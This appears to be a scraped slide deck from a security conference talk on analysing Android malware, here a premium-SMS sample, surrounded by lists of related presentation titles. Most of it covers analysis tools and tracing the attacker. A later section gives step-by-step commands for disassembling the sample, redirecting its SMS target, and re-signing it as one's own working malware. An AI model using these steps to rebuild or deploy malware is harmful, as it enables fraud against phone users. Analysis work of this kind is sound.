ISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and PrivacyISACA CACS 2012 - Mobile Device Security and Privacy
ISACA CACS 2012 - Mobile Device Security and Privacy
 
Forensic And Cloud Computing
Forensic And Cloud ComputingForensic And Cloud Computing
Forensic And Cloud Computing
 
Wfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security InnovationWfh security risks - Ed Adams, President, Security Innovation
Wfh security risks - Ed Adams, President, Security Innovation
 
Building a Mobile Security Program
Building a Mobile Security ProgramBuilding a Mobile Security Program
Building a Mobile Security Program
 
SmartDevCon - Katowice - 2013
SmartDevCon - Katowice - 2013SmartDevCon - Katowice - 2013
SmartDevCon - Katowice - 2013
 
Malware cryptomining uploadv3
Malware cryptomining uploadv3Malware cryptomining uploadv3
Malware cryptomining uploadv3
 
Outsmarting SmartPhones
Outsmarting SmartPhonesOutsmarting SmartPhones
Outsmarting SmartPhones
 

Mais de c0c0n - International Cyber Security and Policing Conference

Mais de c0c0n - International Cyber Security and Policing Conference (6)

Leveraging mobile & wireless technology for Law and Order
Leveraging mobile & wireless technology for Law and OrderLeveraging mobile & wireless technology for Law and Order
Leveraging mobile & wireless technology for Law and Order
 
Why Government & Corporate Cyber Programmes are Failing
Why Government & Corporate Cyber Programmes are Failing Why Government & Corporate Cyber Programmes are Failing
Why Government & Corporate Cyber Programmes are Failing
 
Public Private Partnership - Combating CyberCrime
Public Private Partnership - Combating CyberCrime Public Private Partnership - Combating CyberCrime
Public Private Partnership - Combating CyberCrime
 
OSINT - Open Source Intelligence
OSINT - Open Source IntelligenceOSINT - Open Source Intelligence
OSINT - Open Source Intelligence
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Engines
 
UI-Redressing Attacks - The Process & Exploitation
UI-Redressing Attacks - The Process & ExploitationUI-Redressing Attacks - The Process & Exploitation
UI-Redressing Attacks - The Process & Exploitation
 

Último

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 

Último (20)

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 

I haz you and pwn your maal

  • 1. I haz you and pwn your maal Harsimran Walia
  • 2. #WhoamI • Research Scientist @ McAfee • Expertise: Malware Analysis, Exploit development and Vulnerability Analysis • Twitter: b44nz0r • Email: walia.harsimran@gmail.com • Previous papers: Reversing Microsoft Patches to Reveal Vulnerable code @ NullCon,2012
  • 3. Disclaimer • The research and views presented here are solely mine and nothing to do with any of the current and previous organizations, I work for or associated with in any form • The presentation is for educational purposes only and no one can be held responsible for any harm caused in any form due to use or misuse of information presented here
  • 4. Access Data? • Use of smartphones, tablets, mobile devices • No longer need to stay in one place • Information on the go • But,
  • 5. Danger! • Create a larger attack vector • Treasure trove for attackers • Hot targets for attackers and data thieves • Ease of attack • Vast amount of information
  • 6. Attacks • Most reliable attack is via malware • Malware can 1. penetrate a host 2. extract information 3. stay hidden 4. send data to the attacker • Attackers created smartphone malware • Delivered as smartphone applications
  • 7. Platforms • Many smartphone platform – Apple’s iOS – Android – Symbian – Blackberry • Android by far most popular with attackers
  • 8. Why Android? • 50.1% Smartphone users share in US
  • 9. Why Android? • 61% smartphone sales share in Q1,2012
  • 10. Why Android? Starting development of Iphone OS apps needs • Mac Computer • Sign-in Dev Program • Wait for verification • Pay fees
  • 11. Why Android? • Not only user share, sales are much above any other platform • Huge user base i.e. victims ;) • Ease of malware development and hosting on google play • Have led to:
  • 12. Headlines • Android OS the “worst platform for malware”. - TG Daily August’11 • Android threats leapt 76% during the Q2-2011 - McAfee • Most attacked mobile OS overtaking Symbian OS • The most popular target for mobile malware developers • Increasing target for cybercriminals
  • 13. Malware Analysis Windows Vs Android • 2 methods, dynamic and static • Same, dynamic and static • Virtual machine or sandbox is • Virtual machine with used android SDK • Static analysis - reverse engineer the • In many cases static analysis application/malware reveals the malware using tools and techniques to behavior and very little re-create the actual code and algorithm dynamic analysis is required • Have to debug through • Can be decompiled into assembly code to understand readable java code the algorithm
  • 14. What to expect? • Lab setup, a VM with android SDK installation. • Tools required for the analysis • Static Analysis • Dynamic Analysis • Patching the malware to own it
  • 15. What not to expect? • How to write an android malware • How to spread it • How to hack Android
  • 17. Types of Android Malware • Mobile Device Data Stealers – most common – aim to acquire different info from the infected device • OS version • product ID • International Mobile Equipment Identity (IMEI) number • International Mobile Subscriber Identity (IMSI) number – This stolen device info is encrypted and sent via HTTP POST to the attacker, can be used for future attacks .
  • 18. • Rooting-capable – malware infect to gain so-called root privileges – remote users access to files and the devices’ flash memory – With rooting malware drop copies of themselves onto their flash memory – they can’t be detected and consequently deleted by antivirus products
  • 19. • Premium Service Abusers – hard coded predetermined premium numbers – sends text messages – affected users being charged for sms services • Mobile Device Spies – secretly monitor info stored on infected devices • GPS location • save text and email messages • Like data stealers, sends stolen data to specific URLs via HTTP POST. • focus more on gathering personal data
  • 21. Android One-click Billing Fraud • Mostly active on p0rn and gamer video sites • Trying to view a video triggers a pop-up asking the user to download a malicious app. • Gets the Android user account information, and sends them to the cybercriminals. • Displays a pop-up showing the message – “We haven’t received your payment. Therefore, based on our policy, we will have to charge you if you have not paid yet.” • Also displays the information it stole in order to build credibility for it self, and better convince the victim to pay the amount. • The pop-up is set to show every few minutes and keeps eating your money.
  • 22. WHY DID I WRITE MY PAPER?
  • 23. • Malware Analysis, – important part of antimalware companies’ work. • Mobile malware analysis is now equally important. • Effective analysis can be used by law enforcement agencies to catch law breakers – i.e malware authors and attackers • For fun, when you can pwn someone else’s malware and control it. • You get yourself full-blown malware without writing it.
  • 24. ANDROID MAL-ANALYSIS TOOLS OF TRADE
  • 25. Tools - Static analysis • Mobile Sandbox: provides static analysis of malware images • IDA pro: Supports Android bytecode in version 6.1 and later • APKInspector: Powerful GUI tool for analyzing Android applications. • Dex2jar: For converting Android’s .dex format to Java’s .class format • Jd-gui: A standalone graphical utility that displays Java source codes of .class files. • Androguard: Reverse engineering and Malware analysis of Android applications. • JAD: Java Decompiler • Dexdump: Java .dex file format decompiler • Smali: smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation.
  • 26. Tools – Dynamic analysis • Droidbox: An Android Application Sandbox for Dynamic Analysis • The Android SDK: “A software development kit that enables developers to create applications for the Android platform. Using the Android SDK we can create a virtual android device almost identical in functionality and capabilities of an android telephone and using that virtual device as secure environment we can execute the malware and observe the behaviour of it. • AndroidAuditTools: Dynamic Android analysis tools
  • 28. Traditional malware analysis includes a Virtual Machine • We need a one as well • Android SDK installed in VM • Well documented installation details can be found here http://developer.android.com/sdk/installing.html • Would highlight one thing during installation
  • 29. • Must select atleast one version of the API • API versions to develop applications for different android versions • Separate SDK for malwares targeted for a particular version • Demo – android 2.3 (gingerbread)
  • 31. Android Malware Acquisition • Contagio MiniDump (http://contagiominidump.blogspot.in/) • Community driven • Anyone can submit a sample • It is made available to others • Demo – Voodoo SimpleCarrierIQDetector – supposed to detect presence of the Carrier IQ mobile diagnostic software on the system – Chosen based on the ease of understanding
  • 33. Mobile-sandbox.com • Submit the apk to mobile-sandbox.com for analysis • Report generated can be viewed at http://mobilesandbox.org/xml_report_static/?q=176 • Important information from report Requested Permissions from Android Manifest: android.permission.READ_LOGS android.permission.SEND_SMS sendSMS Potentially dangerous Calls: Execution of native code getPackageInfo
  • 34. Extraction • Start our manual analysis • Need to extract the apk to get its contents • apk file is a zip file formatted package. • Extraction done with win-rar or win-zip • File of interest is classes.dex
  • 35. dex2jar • C:> dex2jar.bat classes.dex – Output: classes.dex classes_dex2jar.jar • Converts classes.dex file extracted from the apk to jar file
  • 36. JD-GUI • To read the code from the .class file in the jar • Open the jar file with JD-GUI
  • 37. • Four .class files – Detect.class • Code is trying to make out if CarrierIQ software is installed on the system based on some checks. – R.class • Every android application contains this class file. Here it is used to declare few variables – Utils.class • Contains few utility method definitions like findFiles. getCommandOutput etc – Main.class • This is the most interesting class as it actually contains the malicious code. • The code looks like this
  • 38.
  • 39. Code Analysis • Four same command to send SMS to the number “81168” with four different SMS texts – AT37 – MC49 – SP99 – SP93 • A Google search on the number shows that it a premium rate sms number that costs almost € 9/SMS • This is how hackers make money with mobile malware
  • 40. • Some malware listens to incoming messages • Deletes them even before a user can read it if • They are from the service providers which would inform users about their balance or billing charges.
  • 41. I haz you • I know the premium rate phone number • Know the text message being sent • If interested in catching the crooks, – find the country and the operator whom the number belongs to – persuade them to disclose the information on the attacker/malware author – Google helps a lot with substantial information available publically regarding the same • If you get the police involved, chances of catching the hax0r are big
  • 42. Scam • On Google I found a funny but very interesting Facebook scam around this • Like other scam Facebook applications, – a user gets messages from his friends on Facebook asking him to vote for his friend on some “Miss and Mister” contest giving an infected web link – Following the link actually hacks the Facebook account rendering it unusable for the user – Attacker then calls him/her up telling him that his account has been blocked for so and so reason – Hence he has to send an SMS to the mentioned number “81168” with any of the 4 texts – He will receive a code that has to be given to the caller(who is the hacker) to unlock his Facebook account.
  • 44. • Finished with the analysis • Extracted information on malware author • Lets own the malware and making it dance to our tunes • Following technique explains the process to own the malware we just analyzed – can be fairly generalized
  • 45. Baksmali • Program used to disassemble the dex files • Disassembles the .dex file to .smali files • Names similar to the .class files • Can be opened in any text-editor • C:> baksmali-0.93.jar –o smali-out classes.dex
  • 46. • File containing the malicious code – main$1.smali – From main.class, figured out in analysis phase – Open in a text editor
  • 47. • Change the destination number of the sms – i.e first argument to sendTextMessage function • Set it to your mobile number or any other • Save the file • Demo – changing it to the port number of my android emulator
  • 48. Smali • Used to compile the .smali files back to .dex file • After making the desired changes to the smali file • Save it, compile all the .smali files together to classes.dex using • C:> smali-0.93.jar smali-out –o classes.dex
  • 49. Packing • Delete the META-INF folder – contains the SHA1 of the classes.dex – will not match the changed classes.dex file – apk signing information – has to be changed • Private key of original author not available • Have to sign the apk with our private key • With modified classes.dex, pack the files back to a .zip file using any packer utility • Change extension from .zip to .apk
  • 50. Signing • Mandated by Google for an application (apk) to be signed by the owner/author’s private key • Cannot install on an emulator or a device, if it is not signed • Can use self-signed certificates to sign applications • No certificate authority is needed • To sign we need, – Keytool – Jarsigner
  • 51. Keytool • Comes as a part of jdk installation • Used to create private key for signing • C:> keytool -genkey -v -keystore my-personal- key.keystore -alias alias_name -keyalg RSA - keysize 2048 -validity 10000 – prompts for passwords for the keystore and key – and the Distinguished Name fields
  • 52. Jarsigner • Comes as a part of jdk installation • Used to sign the apk with created keystore • C:> jarsigner -verbose -sigalg MD5withRSA - digestalg SHA1 -keystore my-release- key.keystore carrieriq.apk alias_name – modifies the APK in-place – creates META_INF folder with the signing details – APK is now signed
  • 53. • To verify if the apk is signed • C:> jarsigner –verify -verbose my_ carrieriq.apk alias_name • If signed properly, it outputs “JAR verified” • Voila! • Got ourselves a malware
  • 55. Install apk (malware) on the android SDK • To verify the behavior that we modified • Open two instances of the android emulator • Install the new malware on one of them • sms num modified should be the port number of emulator other than with malware install.
  • 56. • Install and run the app • As soon uninstall button is clicked • SMS gets sent to the other emulator
  • 57. I pwn your maal • I modified your malware • Customized it to my need • Now I pwn you maal • It will serve me now • ☺ (evil grin)
  • 59. • Overview of how android smartphone OS has become the most popular target for attackers • Describes different types of malware being created for the android platform • Attempts to explain – the lab setup – tools required – the static and dynamic malware analysis – practically analyzing a real premium SMS sending malware
  • 60. • After analysis – Origin of malware is known – We know how to own the malware • In short “I haz you and pwn your maal”.